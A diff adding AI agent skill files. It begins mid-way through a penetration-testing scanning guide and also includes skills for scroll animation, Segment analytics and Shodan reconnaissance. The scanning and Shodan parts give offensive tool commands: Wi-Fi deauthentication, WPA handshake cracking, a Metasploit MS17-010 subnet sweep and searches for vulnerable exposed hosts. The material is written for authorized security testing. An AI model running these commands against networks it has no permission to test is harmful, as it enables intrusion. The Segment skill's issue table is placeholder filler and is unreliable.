masscan -p80 192.168.1.0/24 -oG results.gnmap
|
||||
masscan -p80 192.168.1.0/24 -oJ results.json
|
||||
masscan -p80 192.168.1.0/24 -oX results.xml
|
||||
|
||||
# Banner grabbing
|
||||
masscan -p80 192.168.1.0/24 --banners
|
||||
```
|
||||
|
||||
### Phase 2: Vulnerability Scanning Tools
|
||||
|
||||
#### Nessus
|
||||
|
||||
Enterprise-grade vulnerability assessment:
|
||||
|
||||
```bash
|
||||
# Start Nessus service
|
||||
sudo systemctl start nessusd
|
||||
|
||||
# Access web interface
|
||||
# https://localhost:8834
|
||||
|
||||
# Command-line (nessuscli)
|
||||
nessuscli scan --create --name "Internal Scan" --targets 192.168.1.0/24
|
||||
nessuscli scan --list
|
||||
nessuscli scan --launch <scan_id>
|
||||
nessuscli report --format pdf --output report.pdf <scan_id>
|
||||
```
|
||||
|
||||
Key Nessus features:
|
||||
- Comprehensive CVE detection
|
||||
- Compliance checks (PCI-DSS, HIPAA, CIS)
|
||||
- Custom scan templates
|
||||
- Credentialed scanning for deeper analysis
|
||||
- Regular plugin updates
|
||||
|
||||
#### OpenVAS (Greenbone)
|
||||
|
||||
Open-source vulnerability scanning:
|
||||
|
||||
```bash
|
||||
# Install OpenVAS
|
||||
sudo apt install openvas
|
||||
sudo gvm-setup
|
||||
|
||||
# Start services
|
||||
sudo gvm-start
|
||||
|
||||
# Access web interface (Greenbone Security Assistant)
|
||||
# https://localhost:9392
|
||||
|
||||
# Command-line operations
|
||||
gvm-cli socket --xml "<get_version/>"
|
||||
gvm-cli socket --xml "<get_tasks/>"
|
||||
|
||||
# Create and run scan
|
||||
gvm-cli socket --xml '
|
||||
<create_target>
|
||||
<name>Test Target</name>
|
||||
<hosts>192.168.1.0/24</hosts>
|
||||
</create_target>'
|
||||
```
|
||||
|
||||
### Phase 3: Web Application Scanning Tools
|
||||
|
||||
#### Burp Suite
|
||||
|
||||
Comprehensive web application testing:
|
||||
|
||||
```
|
||||
# Proxy configuration
|
||||
1. Set browser proxy to 127.0.0.1:8080
|
||||
2. Import Burp CA certificate for HTTPS
|
||||
3. Add target to scope
|
||||
|
||||
# Key modules:
|
||||
- Proxy: Intercept and modify requests
|
||||
- Spider: Crawl web applications
|
||||
- Scanner: Automated vulnerability detection
|
||||
- Intruder: Automated attacks (fuzzing, brute-force)
|
||||
- Repeater: Manual request manipulation
|
||||
- Decoder: Encode/decode data
|
||||
- Comparer: Compare responses
|
||||
```
|
||||
|
||||
Core testing workflow:
|
||||
1. Configure proxy and scope
|
||||
2. Spider the application
|
||||
3. Analyze sitemap
|
||||
4. Run active scanner
|
||||
5. Manual testing with Repeater/Intruder
|
||||
6. Review findings and generate report
|
||||
|
||||
#### OWASP ZAP
|
||||
|
||||
Open-source web application scanner:
|
||||
|
||||
```bash
|
||||
# Start ZAP
|
||||
zaproxy
|
||||
|
||||
# Automated scan from CLI
|
||||
zap-cli quick-scan https://target.com
|
||||
|
||||
# Full scan
|
||||
zap-cli spider https://target.com
|
||||
zap-cli active-scan https://target.com
|
||||
|
||||
# Generate report
|
||||
zap-cli report -o report.html -f html
|
||||
|
||||
# API mode
|
||||
zap.sh -daemon -port 8080 -config api.key=<your_key>
|
||||
```
|
||||
|
||||
ZAP automation:
|
||||
```bash
|
||||
# Docker-based scanning
|
||||
docker run -t owasp/zap2docker-stable zap-full-scan.py \
|
||||
-t https://target.com -r report.html
|
||||
|
||||
# Baseline scan (passive only)
|
||||
docker run -t owasp/zap2docker-stable zap-baseline.py \
|
||||
-t https://target.com -r report.html
|
||||
```
|
||||
|
||||
#### Nikto
|
||||
|
||||
Web server vulnerability scanner:
|
||||
|
||||
```bash
|
||||
# Basic scan
|
||||
nikto -h https://target.com
|
||||
|
||||
# Scan specific port
|
||||
nikto -h target.com -p 8080
|
||||
|
||||
# Scan with SSL
|
||||
nikto -h target.com -ssl
|
||||
|
||||
# Multiple targets
|
||||
nikto -h targets.txt
|
||||
|
||||
# Output formats
|
||||
nikto -h target.com -o report.html -Format html
|
||||
nikto -h target.com -o report.xml -Format xml
|
||||
nikto -h target.com -o report.csv -Format csv
|
||||
|
||||
# Tuning options
|
||||
nikto -h target.com -Tuning 123456789 # All tests
|
||||
nikto -h target.com -Tuning x # Exclude specific tests
|
||||
```
|
||||
|
||||
### Phase 4: Wireless Scanning Tools
|
||||
|
||||
#### Aircrack-ng Suite
|
||||
|
||||
Wireless network penetration testing:
|
||||
|
||||
```bash
|
||||
# Check wireless interface
|
||||
airmon-ng
|
||||
|
||||
# Enable monitor mode
|
||||
sudo airmon-ng start wlan0
|
||||
|
||||
# Scan for networks
|
||||
sudo airodump-ng wlan0mon
|
||||
|
||||
# Capture specific network
|
||||
sudo airodump-ng -c <channel> --bssid <target_bssid> -w capture wlan0mon
|
||||
|
||||
# Deauthentication attack
|
||||
sudo aireplay-ng -0 10 -a <bssid> wlan0mon
|
||||
|
||||
# Crack WPA handshake
|
||||
aircrack-ng -w wordlist.txt -b <bssid> capture*.cap
|
||||
|
||||
# Crack WEP
|
||||
aircrack-ng -b <bssid> capture*.cap
|
||||
```
|
||||
|
||||
#### Kismet
|
||||
|
||||
Passive wireless detection:
|
||||
|
||||
```bash
|
||||
# Start Kismet
|
||||
kismet
|
||||
|
||||
# Specify interface
|
||||
kismet -c wlan0
|
||||
|
||||
# Access web interface
|
||||
# http://localhost:2501
|
||||
|
||||
# Detect hidden networks
|
||||
# Kismet passively collects all beacon frames
|
||||
# including those from hidden SSIDs
|
||||
```
|
||||
|
||||
### Phase 5: Malware and Exploit Scanning
|
||||
|
||||
#### ClamAV
|
||||
|
||||
Open-source antivirus scanning:
|
||||
|
||||
```bash
|
||||
# Update virus definitions
|
||||
sudo freshclam
|
||||
|
||||
# Scan directory
|
||||
clamscan -r /path/to/scan
|
||||
|
||||
# Scan with verbose output
|
||||
clamscan -r -v /path/to/scan
|
||||
|
||||
# Move infected files
|
||||
clamscan -r --move=/quarantine /path/to/scan
|
||||
|
||||
# Remove infected files
|
||||
clamscan -r --remove /path/to/scan
|
||||
|
||||
# Scan specific file types
|
||||
clamscan -r --include='\.exe$|\.dll$' /path/to/scan
|
||||
|
||||
# Output to log
|
||||
clamscan -r -l scan.log /path/to/scan
|
||||
```
|
||||
|
||||
#### Metasploit Vulnerability Validation
|
||||
|
||||
Validate vulnerabilities with exploitation:
|
||||
|
||||
```bash
|
||||
# Start Metasploit
|
||||
msfconsole
|
||||
|
||||
# Database setup
|
||||
msfdb init
|
||||
db_status
|
||||
|
||||
# Import Nmap results
|
||||
db_import /path/to/nmap_scan.xml
|
||||
|
||||
# Vulnerability scanning
|
||||
use auxiliary/scanner/smb/smb_ms17_010
|
||||
set RHOSTS 192.168.1.0/24
|
||||
run
|
||||
|
||||
# Auto exploitation
|
||||
vulns # View vulnerabilities
|
||||
analyze # Suggest exploits
|
||||
```
|
||||
|
||||
### Phase 6: Cloud Security Scanning
|
||||
|
||||
#### Prowler (AWS)
|
||||
|
||||
AWS security assessment:
|
||||
|
||||
```bash
|
||||
# Install Prowler
|
||||
pip install prowler
|
||||
|
||||
# Basic scan
|
||||
prowler aws
|
||||
|
||||
# Specific checks
|
||||
prowler aws -c iam s3 ec2
|
||||
|
||||
# Compliance framework
|
||||
prowler aws --compliance cis_aws
|
||||
|
||||
# Output formats
|
||||
prowler aws -M html json csv
|
||||
|
||||
# Specific region
|
||||
prowler aws -f us-east-1
|
||||
|
||||
# Assume role
|
||||
prowler aws -R arn:aws:iam::123456789012:role/ProwlerRole
|
||||
```
|
||||
|
||||
#### ScoutSuite (Multi-cloud)
|
||||
|
||||
Multi-cloud security auditing:
|
||||
|
||||
```bash
|
||||
# Install ScoutSuite
|
||||
pip install scoutsuite
|
||||
|
||||
# AWS scan
|
||||
scout aws
|
||||
|
||||
# Azure scan
|
||||
scout azure --cli
|
||||
|
||||
# GCP scan
|
||||
scout gcp --user-account
|
||||
|
||||
# Generate report
|
||||
scout aws --report-dir ./reports
|
||||
```
|
||||
|
||||
### Phase 7: Compliance Scanning
|
||||
|
||||
#### Lynis
|
||||
|
||||
Security auditing for Unix/Linux:
|
||||
|
||||
```bash
|
||||
# Run audit
|
||||
sudo lynis audit system
|
||||
|
||||
# Quick scan
|
||||
sudo lynis audit system --quick
|
||||
|
||||
# Specific profile
|
||||
sudo lynis audit system --profile server
|
||||
|
||||
# Output report
|
||||
sudo lynis audit system --report-file /tmp/lynis-report.dat
|
||||
|
||||
# Check specific section
|
||||
sudo lynis show profiles
|
||||
sudo lynis audit system --tests-from-group malware
|
||||
```
|
||||
|
||||
#### OpenSCAP
|
||||
|
||||
Security compliance scanning:
|
||||
|
||||
```bash
|
||||
# List available profiles
|
||||
oscap info /usr/share/xml/scap/ssg/content/ssg-<distro>-ds.xml
|
||||
|
||||
# Run scan with profile
|
||||
oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_pci-dss \
|
||||
--report report.html \
|
||||
/usr/share/xml/scap/ssg/content/ssg-rhel8-ds.xml
|
||||
|
||||
# Generate fix script
|
||||
oscap xccdf generate fix \
|
||||
--profile xccdf_org.ssgproject.content_profile_pci-dss \
|
||||
--output remediation.sh \
|
||||
/usr/share/xml/scap/ssg/content/ssg-rhel8-ds.xml
|
||||
```
|
||||
|
||||
### Phase 8: Scanning Methodology
|
||||
|
||||
Structured scanning approach:
|
||||
|
||||
1. **Planning**
|
||||
- Define scope and objectives
|
||||
- Obtain proper authorization
|
||||
- Select appropriate tools
|
||||
|
||||
2. **Discovery**
|
||||
- Host discovery (Nmap ping sweep)
|
||||
- Port scanning
|
||||
- Service enumeration
|
||||
|
||||
3. **Vulnerability Assessment**
|
||||
- Automated scanning (Nessus/OpenVAS)
|
||||
- Web application scanning (Burp/ZAP)
|
||||
- Manual verification
|
||||
|
||||
4. **Analysis**
|
||||
- Correlate findings
|
||||
- Eliminate false positives
|
||||
- Prioritize by severity
|
||||
|
||||
5. **Reporting**
|
||||
- Document findings
|
||||
- Provide remediation guidance
|
||||
- Executive summary
|
||||
|
||||
### Phase 9: Tool Selection Guide
|
||||
|
||||
Choose the right tool for each scenario:
|
||||
|
||||
| Scenario | Recommended Tools |
|
||||
|----------|-------------------|
|
||||
| Network Discovery | Nmap, Masscan |
|
||||
| Vulnerability Assessment | Nessus, OpenVAS |
|
||||
| Web App Testing | Burp Suite, ZAP, Nikto |
|
||||
| Wireless Security | Aircrack-ng, Kismet |
|
||||
| Malware Detection | ClamAV, YARA |
|
||||
| Cloud Security | Prowler, ScoutSuite |
|
||||
| Compliance | Lynis, OpenSCAP |
|
||||
| Protocol Analysis | Wireshark, tcpdump |
|
||||
|
||||
### Phase 10: Reporting and Documentation
|
||||
|
||||
Generate professional reports:
|
||||
|
||||
```bash
|
||||
# Nmap XML to HTML
|
||||
xsltproc nmap-output.xml -o report.html
|
||||
|
||||
# OpenVAS report export
|
||||
gvm-cli socket --xml '<get_reports report_id="<id>" format_id="<pdf_format>"/>'
|
||||
|
||||
# Combine multiple scan results
|
||||
# Use tools like Faraday, Dradis, or custom scripts
|
||||
|
||||
# Executive summary template:
|
||||
# 1. Scope and methodology
|
||||
# 2. Key findings summary
|
||||
# 3. Risk distribution chart
|
||||
# 4. Critical vulnerabilities
|
||||
# 5. Remediation recommendations
|
||||
# 6. Detailed technical findings
|
||||
```
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Nmap Cheat Sheet
|
||||
|
||||
| Scan Type | Command |
|
||||
|-----------|---------|
|
||||
| Ping Scan | `nmap -sn <target>` |
|
||||
| Quick Scan | `nmap -T4 -F <target>` |
|
||||
| Full Scan | `nmap -p- <target>` |
|
||||
| Service Scan | `nmap -sV <target>` |
|
||||
| OS Detection | `nmap -O <target>` |
|
||||
| Aggressive | `nmap -A <target>` |
|
||||
| Vuln Scripts | `nmap --script=vuln <target>` |
|
||||
| Stealth Scan | `nmap -sS -T2 <target>` |
|
||||
|
||||
### Common Ports Reference
|
||||
|
||||
| Port | Service |
|
||||
|------|---------|
|
||||
| 21 | FTP |
|
||||
| 22 | SSH |
|
||||
| 23 | Telnet |
|
||||
| 25 | SMTP |
|
||||
| 53 | DNS |
|
||||
| 80 | HTTP |
|
||||
| 443 | HTTPS |
|
||||
| 445 | SMB |
|
||||
| 3306 | MySQL |
|
||||
| 3389 | RDP |
|
||||
|
||||
## Constraints and Limitations
|
||||
|
||||
### Legal Considerations
|
||||
- Always obtain written authorization
|
||||
- Respect scope boundaries
|
||||
- Follow responsible disclosure practices
|
||||
- Comply with local laws and regulations
|
||||
|
||||
### Technical Limitations
|
||||
- Some scans may trigger IDS/IPS alerts
|
||||
- Heavy scanning can impact network performance
|
||||
- False positives require manual verification
|
||||
- Encrypted traffic may limit analysis
|
||||
|
||||
### Best Practices
|
||||
- Start with non-intrusive scans
|
||||
- Gradually increase scan intensity
|
||||
- Document all scanning activities
|
||||
- Validate findings before reporting
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Scan Not Detecting Hosts
|
||||
|
||||
**Solutions:**
|
||||
1. Try different discovery methods: `nmap -Pn` or `nmap -sn -PS/PA/PU`
|
||||
2. Check firewall rules blocking ICMP
|
||||
3. Use TCP SYN scan: `nmap -PS22,80,443`
|
||||
4. Verify network connectivity
|
||||
|
||||
### Slow Scan Performance
|
||||
|
||||
**Solutions:**
|
||||
1. Increase timing: `nmap -T4` or `-T5`
|
||||
2. Reduce port range: `--top-ports 100`
|
||||
3. Use Masscan for initial discovery
|
||||
4. Disable DNS resolution: `-n`
|
||||
|
||||
### Web Scanner Missing Vulnerabilities
|
||||
|
||||
**Solutions:**
|
||||
1. Authenticate to access protected areas
|
||||
2. Increase crawl depth
|
||||
3. Add custom injection points
|
||||
4. Use multiple tools for coverage
|
||||
5. Perform manual testing
|
||||
263
skills/scroll-experience/SKILL.md
Normal file
263
skills/scroll-experience/SKILL.md
Normal file
@@ -0,0 +1,263 @@
|
||||
---
|
||||
name: scroll-experience
|
||||
description: "Expert in building immersive scroll-driven experiences - parallax storytelling, scroll animations, interactive narratives, and cinematic web experiences. Like NY Times interactives, Apple product pages, and award-winning web experiences. Makes websites feel like experiences, not just pages. Use when: scroll animation, parallax, scroll storytelling, interactive story, cinematic website."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Scroll Experience
|
||||
|
||||
**Role**: Scroll Experience Architect
|
||||
|
||||
You see scrolling as a narrative device, not just navigation. You create
|
||||
moments of delight as users scroll. You know when to use subtle animations
|
||||
and when to go cinematic. You balance performance with visual impact. You
|
||||
make websites feel like movies you control with your thumb.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Scroll-driven animations
|
||||
- Parallax storytelling
|
||||
- Interactive narratives
|
||||
- Cinematic web experiences
|
||||
- Scroll-triggered reveals
|
||||
- Progress indicators
|
||||
- Sticky sections
|
||||
- Scroll snapping
|
||||
|
||||
## Patterns
|
||||
|
||||
### Scroll Animation Stack
|
||||
|
||||
Tools and techniques for scroll animations
|
||||
|
||||
**When to use**: When planning scroll-driven experiences
|
||||
|
||||
```python
|
||||
## Scroll Animation Stack
|
||||
|
||||
### Library Options
|
||||
| Library | Best For | Learning Curve |
|
||||
|---------|----------|----------------|
|
||||
| GSAP ScrollTrigger | Complex animations | Medium |
|
||||
| Framer Motion | React projects | Low |
|
||||
| Locomotive Scroll | Smooth scroll + parallax | Medium |
|
||||
| Lenis | Smooth scroll only | Low |
|
||||
| CSS scroll-timeline | Simple, native | Low |
|
||||
|
||||
### GSAP ScrollTrigger Setup
|
||||
```javascript
|
||||
import { gsap } from 'gsap';
|
||||
import { ScrollTrigger } from 'gsap/ScrollTrigger';
|
||||
|
||||
gsap.registerPlugin(ScrollTrigger);
|
||||
|
||||
// Basic scroll animation
|
||||
gsap.to('.element', {
|
||||
scrollTrigger: {
|
||||
trigger: '.element',
|
||||
start: 'top center',
|
||||
end: 'bottom center',
|
||||
scrub: true, // Links animation to scroll position
|
||||
},
|
||||
y: -100,
|
||||
opacity: 1,
|
||||
});
|
||||
```
|
||||
|
||||
### Framer Motion Scroll
|
||||
```jsx
|
||||
import { motion, useScroll, useTransform } from 'framer-motion';
|
||||
|
||||
function ParallaxSection() {
|
||||
const { scrollYProgress } = useScroll();
|
||||
const y = useTransform(scrollYProgress, [0, 1], [0, -200]);
|
||||
|
||||
return (
|
||||
<motion.div style={{ y }}>
|
||||
Content moves with scroll
|
||||
</motion.div>
|
||||
);
|
||||
}
|
||||
```
|
||||
|
||||
### CSS Native (2024+)
|
||||
```css
|
||||
@keyframes reveal {
|
||||
from { opacity: 0; transform: translateY(50px); }
|
||||
to { opacity: 1; transform: translateY(0); }
|
||||
}
|
||||
|
||||
.animate-on-scroll {
|
||||
animation: reveal linear;
|
||||
animation-timeline: view();
|
||||
animation-range: entry 0% cover 40%;
|
||||
}
|
||||
```
|
||||
```
|
||||
|
||||
### Parallax Storytelling
|
||||
|
||||
Tell stories through scroll depth
|
||||
|
||||
**When to use**: When creating narrative experiences
|
||||
|
||||
```javascript
|
||||
## Parallax Storytelling
|
||||
|
||||
### Layer Speeds
|
||||
| Layer | Speed | Effect |
|
||||
|-------|-------|--------|
|
||||
| Background | 0.2x | Far away, slow |
|
||||
| Midground | 0.5x | Middle depth |
|
||||
| Foreground | 1.0x | Normal scroll |
|
||||
| Content | 1.0x | Readable |
|
||||
| Floating elements | 1.2x | Pop forward |
|
||||
|
||||
### Creating Depth
|
||||
```javascript
|
||||
// GSAP parallax layers
|
||||
gsap.to('.background', {
|
||||
scrollTrigger: {
|
||||
scrub: true
|
||||
},
|
||||
y: '-20%', // Moves slower
|
||||
});
|
||||
|
||||
gsap.to('.foreground', {
|
||||
scrollTrigger: {
|
||||
scrub: true
|
||||
},
|
||||
y: '-50%', // Moves faster
|
||||
});
|
||||
```
|
||||
|
||||
### Story Beats
|
||||
```
|
||||
Section 1: Hook (full viewport, striking visual)
|
||||
↓ scroll
|
||||
Section 2: Context (text + supporting visuals)
|
||||
↓ scroll
|
||||
Section 3: Journey (parallax storytelling)
|
||||
↓ scroll
|
||||
Section 4: Climax (dramatic reveal)
|
||||
↓ scroll
|
||||
Section 5: Resolution (CTA or conclusion)
|
||||
```
|
||||
|
||||
### Text Reveals
|
||||
- Fade in on scroll
|
||||
- Typewriter effect on trigger
|
||||
- Word-by-word highlight
|
||||
- Sticky text with changing visuals
|
||||
```
|
||||
|
||||
### Sticky Sections
|
||||
|
||||
Pin elements while scrolling through content
|
||||
|
||||
**When to use**: When content should stay visible during scroll
|
||||
|
||||
```javascript
|
||||
## Sticky Sections
|
||||
|
||||
### CSS Sticky
|
||||
```css
|
||||
.sticky-container {
|
||||
height: 300vh; /* Space for scrolling */
|
||||
}
|
||||
|
||||
.sticky-element {
|
||||
position: sticky;
|
||||
top: 0;
|
||||
height: 100vh;
|
||||
}
|
||||
```
|
||||
|
||||
### GSAP Pin
|
||||
```javascript
|
||||
gsap.to('.content', {
|
||||
scrollTrigger: {
|
||||
trigger: '.section',
|
||||
pin: true, // Pins the section
|
||||
start: 'top top',
|
||||
end: '+=1000', // Pin for 1000px of scroll
|
||||
scrub: true,
|
||||
},
|
||||
// Animate while pinned
|
||||
x: '-100vw',
|
||||
});
|
||||
```
|
||||
|
||||
### Horizontal Scroll Section
|
||||
```javascript
|
||||
const sections = gsap.utils.toArray('.panel');
|
||||
|
||||
gsap.to(sections, {
|
||||
xPercent: -100 * (sections.length - 1),
|
||||
ease: 'none',
|
||||
scrollTrigger: {
|
||||
trigger: '.horizontal-container',
|
||||
pin: true,
|
||||
scrub: 1,
|
||||
end: () => '+=' + document.querySelector('.horizontal-container').offsetWidth,
|
||||
},
|
||||
});
|
||||
```
|
||||
|
||||
### Use Cases
|
||||
- Product feature walkthrough
|
||||
- Before/after comparisons
|
||||
- Step-by-step processes
|
||||
- Image galleries
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Scroll Hijacking
|
||||
|
||||
**Why bad**: Users hate losing scroll control.
|
||||
Accessibility nightmare.
|
||||
Breaks back button expectations.
|
||||
Frustrating on mobile.
|
||||
|
||||
**Instead**: Enhance scroll, don't replace it.
|
||||
Keep natural scroll speed.
|
||||
Use scrub animations.
|
||||
Allow users to scroll normally.
|
||||
|
||||
### ❌ Animation Overload
|
||||
|
||||
**Why bad**: Distracting, not delightful.
|
||||
Performance tanks.
|
||||
Content becomes secondary.
|
||||
User fatigue.
|
||||
|
||||
**Instead**: Less is more.
|
||||
Animate key moments.
|
||||
Static content is okay.
|
||||
Guide attention, don't overwhelm.
|
||||
|
||||
### ❌ Desktop-Only Experience
|
||||
|
||||
**Why bad**: Mobile is majority of traffic.
|
||||
Touch scroll is different.
|
||||
Performance issues on phones.
|
||||
Unusable experience.
|
||||
|
||||
**Instead**: Mobile-first scroll design.
|
||||
Simpler effects on mobile.
|
||||
Test on real devices.
|
||||
Graceful degradation.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Animations stutter during scroll | high | ## Fixing Scroll Jank |
|
||||
| Parallax breaks on mobile devices | high | ## Mobile-Safe Parallax |
|
||||
| Scroll experience is inaccessible | medium | ## Accessible Scroll Experiences |
|
||||
| Critical content hidden below animations | medium | ## Content-First Scroll Design |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `3d-web-experience`, `frontend`, `ui-design`, `landing-page-design`
|
||||
50
skills/segment-cdp/SKILL.md
Normal file
50
skills/segment-cdp/SKILL.md
Normal file
@@ -0,0 +1,50 @@
|
||||
---
|
||||
name: segment-cdp
|
||||
description: "Expert patterns for Segment Customer Data Platform including Analytics.js, server-side tracking, tracking plans with Protocols, identity resolution, destinations configuration, and data governance best practices. Use when: segment, analytics.js, customer data platform, cdp, tracking plan."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Segment CDP
|
||||
|
||||
## Patterns
|
||||
|
||||
### Analytics.js Browser Integration
|
||||
|
||||
Client-side tracking with Analytics.js. Include track, identify, page,
|
||||
and group calls. Anonymous ID persists until identify merges with user.
|
||||
|
||||
|
||||
### Server-Side Tracking with Node.js
|
||||
|
||||
High-performance server-side tracking using @segment/analytics-node.
|
||||
Non-blocking with internal batching. Essential for backend events,
|
||||
webhooks, and sensitive data.
|
||||
|
||||
|
||||
### Tracking Plan Design
|
||||
|
||||
Design event schemas using Object + Action naming convention.
|
||||
Define required properties, types, and validation rules.
|
||||
Connect to Protocols for enforcement.
|
||||
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Dynamic Event Names
|
||||
|
||||
### ❌ Tracking Properties as Events
|
||||
|
||||
### ❌ Missing Identify Before Track
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | medium | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | low | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | high | See docs |
|
||||
500
skills/shodan-reconnaissance/SKILL.md
Normal file
500
skills/shodan-reconnaissance/SKILL.md
Normal file
@@ -0,0 +1,500 @@
|
||||
---
|
||||
name: Shodan Reconnaissance and Pentesting
|
||||
description: This skill should be used when the user asks to "search for exposed devices on the internet," "perform Shodan reconnaissance," "find vulnerable services using Shodan," "scan IP ranges with Shodan," or "discover IoT devices and open ports." It provides comprehensive guidance for using Shodan's search engine, CLI, and API for penetration testing reconnaissance.
|
||||
---
|
||||
|
||||
# Shodan Reconnaissance and Pentesting
|
||||
|
||||
## Purpose
|
||||
|
||||
Provide systematic methodologies for leveraging Shodan as a reconnaissance tool during penetration testing engagements. This skill covers the Shodan web interface, command-line interface (CLI), REST API, search filters, on-demand scanning, and network monitoring capabilities for discovering exposed services, vulnerable systems, and IoT devices.
|
||||
|
||||
## Inputs / Prerequisites
|
||||
|
||||
- **Shodan Account**: Free or paid account at shodan.io
|
||||
- **API Key**: Obtained from Shodan account dashboard
|
||||
- **Target Information**: IP addresses, domains, or network ranges to investigate
|
||||
- **Shodan CLI**: Python-based command-line tool installed
|
||||
- **Authorization**: Written permission for reconnaissance on target networks
|
||||
|
||||
## Outputs / Deliverables
|
||||
|
||||
- **Asset Inventory**: List of discovered hosts, ports, and services
|
||||
- **Vulnerability Report**: Identified CVEs and exposed vulnerable services
|
||||
- **Banner Data**: Service banners revealing software versions
|
||||
- **Network Mapping**: Geographic and organizational distribution of assets
|
||||
- **Screenshot Gallery**: Visual reconnaissance of exposed interfaces
|
||||
- **Exported Data**: JSON/CSV files for further analysis
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### 1. Setup and Configuration
|
||||
|
||||
#### Install Shodan CLI
|
||||
```bash
|
||||
# Using pip
|
||||
pip install shodan
|
||||
|
||||
# Or easy_install
|
||||
easy_install shodan
|
||||
|
||||
# On BlackArch/Arch Linux
|
||||
sudo pacman -S python-shodan
|
||||
```
|
||||
|
||||
#### Initialize API Key
|
||||
```bash
|
||||
# Set your API key
|
||||
shodan init YOUR_API_KEY
|
||||
|
||||
# Verify setup
|
||||
shodan info
|
||||
# Output: Query credits available: 100
|
||||
# Scan credits available: 100
|
||||
```
|
||||
|
||||
#### Check Account Status
|
||||
```bash
|
||||
# View credits and plan info
|
||||
shodan info
|
||||
|
||||
# Check your external IP
|
||||
shodan myip
|
||||
|
||||
# Check CLI version
|
||||
shodan version
|
||||
```
|
||||
|
||||
### 2. Basic Host Reconnaissance
|
||||
|
||||
#### Query Single Host
|
||||
```bash
|
||||
# Get all information about an IP
|
||||
shodan host 1.1.1.1
|
||||
|
||||
# Example output:
|
||||
# 1.1.1.1
|
||||
# Hostnames: one.one.one.one
|
||||
# Country: Australia
|
||||
# Organization: Mountain View Communications
|
||||
# Number of open ports: 3
|
||||
# Ports:
|
||||
# 53/udp
|
||||
# 80/tcp
|
||||
# 443/tcp
|
||||
```
|
||||
|
||||
#### Check if Host is Honeypot
|
||||
```bash
|
||||
# Get honeypot probability score
|
||||
shodan honeyscore 192.168.1.100
|
||||
|
||||
# Output: Not a honeypot
|
||||
# Score: 0.3
|
||||
```
|
||||
|
||||
### 3. Search Queries
|
||||
|
||||
#### Basic Search (Free)
|
||||
```bash
|
||||
# Simple keyword search (no credits consumed)
|
||||
shodan search apache
|
||||
|
||||
# Specify output fields
|
||||
shodan search --fields ip_str,port,os smb
|
||||
```
|
||||
|
||||
#### Filtered Search (1 Credit)
|
||||
```bash
|
||||
# Product-specific search
|
||||
shodan search product:mongodb
|
||||
|
||||
# Search with multiple filters
|
||||
shodan search product:nginx country:US city:"New York"
|
||||
```
|
||||
|
||||
#### Count Results
|
||||
```bash
|
||||
# Get result count without consuming credits
|
||||
shodan count openssh
|
||||
# Output: 23128
|
||||
|
||||
shodan count openssh 7
|
||||
# Output: 219
|
||||
```
|
||||
|
||||
#### Download Results
|
||||
```bash
|
||||
# Download 1000 results (default)
|
||||
shodan download results.json.gz "apache country:US"
|
||||
|
||||
# Download specific number of results
|
||||
shodan download --limit 5000 results.json.gz "nginx"
|
||||
|
||||
# Download all available results
|
||||
shodan download --limit -1 all_results.json.gz "query"
|
||||
```
|
||||
|
||||
#### Parse Downloaded Data
|
||||
```bash
|
||||
# Extract specific fields from downloaded data
|
||||
shodan parse --fields ip_str,port,hostnames results.json.gz
|
||||
|
||||
# Filter by specific criteria
|
||||
shodan parse --fields location.country_code3,ip_str -f port:22 results.json.gz
|
||||
|
||||
# Export to CSV format
|
||||
shodan parse --fields ip_str,port,org --separator , results.json.gz > results.csv
|
||||
```
|
||||
|
||||
### 4. Search Filters Reference
|
||||
|
||||
#### Network Filters
|
||||
```
|
||||
ip:1.2.3.4 # Specific IP address
|
||||
net:192.168.0.0/24 # Network range (CIDR)
|
||||
hostname:example.com # Hostname contains
|
||||
port:22 # Specific port
|
||||
asn:AS15169 # Autonomous System Number
|
||||
```
|
||||
|
||||
#### Geographic Filters
|
||||
```
|
||||
country:US # Two-letter country code
|
||||
country:"United States" # Full country name
|
||||
city:"San Francisco" # City name
|
||||
state:CA # State/region
|
||||
postal:94102 # Postal/ZIP code
|
||||
geo:37.7,-122.4 # Lat/long coordinates
|
||||
```
|
||||
|
||||
#### Organization Filters
|
||||
```
|
||||
org:"Google" # Organization name
|
||||
isp:"Comcast" # ISP name
|
||||
```
|
||||
|
||||
#### Service/Product Filters
|
||||
```
|
||||
product:nginx # Software product
|
||||
version:1.14.0 # Software version
|
||||
os:"Windows Server 2019" # Operating system
|
||||
http.title:"Dashboard" # HTTP page title
|
||||
http.html:"login" # HTML content
|
||||
http.status:200 # HTTP status code
|
||||
ssl.cert.subject.cn:*.example.com # SSL certificate
|
||||
ssl:true # Has SSL enabled
|
||||
```
|
||||
|
||||
#### Vulnerability Filters
|
||||
```
|
||||
vuln:CVE-2019-0708 # Specific CVE
|
||||
has_vuln:true # Has any vulnerability
|
||||
```
|
||||
|
||||
#### Screenshot Filters
|
||||
```
|
||||
has_screenshot:true # Has screenshot available
|
||||
screenshot.label:webcam # Screenshot type
|
||||
```
|
||||
|
||||
### 5. On-Demand Scanning
|
||||
|
||||
#### Submit Scan
|
||||
```bash
|
||||
# Scan single IP (1 credit per IP)
|
||||
shodan scan submit 192.168.1.100
|
||||
|
||||
# Scan with verbose output (shows scan ID)
|
||||
shodan scan submit --verbose 192.168.1.100
|
||||
|
||||
# Scan and save results
|
||||
shodan scan submit --filename scan_results.json.gz 192.168.1.100
|
||||
```
|
||||
|
||||
#### Monitor Scan Status
|
||||
```bash
|
||||
# List recent scans
|
||||
shodan scan list
|
||||
|
||||
